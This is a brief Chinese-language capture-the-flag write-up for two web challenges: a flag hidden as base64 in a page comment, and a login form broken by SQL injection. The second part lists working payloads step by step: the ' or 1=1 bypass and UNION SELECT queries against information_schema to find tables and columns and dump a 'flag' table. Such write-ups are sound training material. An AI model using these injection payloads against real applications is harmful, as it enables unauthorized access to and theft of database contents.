web签到题
打开题目,只有一句话
查看源码,发现有一段注释
注释很像base64编码,解码后得到flag
web2
题目中有两个输入框,试试有没有注入点
尝试万能密码’or 1=1
成功登录
可以继续尝试联合注入,先查回显位置
从’ or 1=1 union select 1, #开始
在’or 1=1 union select 1,2,3 # 时查到回显位置为2
接下来查询表名
'or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() #
去flag表中查询字段名,离flag已经很近了
’ or 1=1 union select 1, column_name,3 from information_schema.columns where table_name=‘flag’ #
查询到字段名也是flag,直接在字段中查flag
’ or 1=1 union select 1,flag,3 from flag #
大功告成!